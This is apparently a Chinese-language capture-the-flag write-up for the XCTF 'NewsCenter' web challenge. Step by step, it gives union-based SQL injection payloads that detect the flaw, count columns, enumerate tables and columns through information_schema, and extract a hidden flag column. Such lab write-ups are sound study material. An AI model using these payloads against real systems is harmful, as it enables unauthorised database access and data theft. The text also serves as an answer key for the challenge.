攻防世界-web高级进阶-NewsCenter-WriteUp

NewsCenter

打开页面,发现有个搜索框,猜测是sql注入
1.输入一个 ’ 页面出错
攻防世界-web高级进阶-NewsCenter-WriteUp_第1张图片2. 在 ’ 后面输入 # 页面返回正常

攻防世界-web高级进阶-NewsCenter-WriteUp_第2张图片 3. 判断字段数 ’ and 1=2 order by 1 # 页面正常,输入 ’ and 1=2 order by 4 # 页面发生错误,说明有3个字段。
攻防世界-web高级进阶-NewsCenter-WriteUp_第3张图片4. 判断回显点 'and 1=2 union select 1,2,3# 发现返回了2和3

攻防世界-web高级进阶-NewsCenter-WriteUp_第4张图片5. 查看表名 ’ and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=database()#
返回了数据库表 secret_table
攻防世界-web高级进阶-NewsCenter-WriteUp_第5张图片6. 知道了表名之后查看字段名 ’ and 1=2 union select 1,column_name,3 from information_schema.columns where table_name=‘secret_table’#
返回了fl4g (flag很明显是在这里了)
攻防世界-web高级进阶-NewsCenter-WriteUp_第6张图片7. 查看字段内容 ’ and 1=2 union select 1,fl4g,3 from secret_table# 拿到flag值
攻防世界-web高级进阶-NewsCenter-WriteUp_第7张图片

你可能感兴趣的:(web,SQL注入,安全)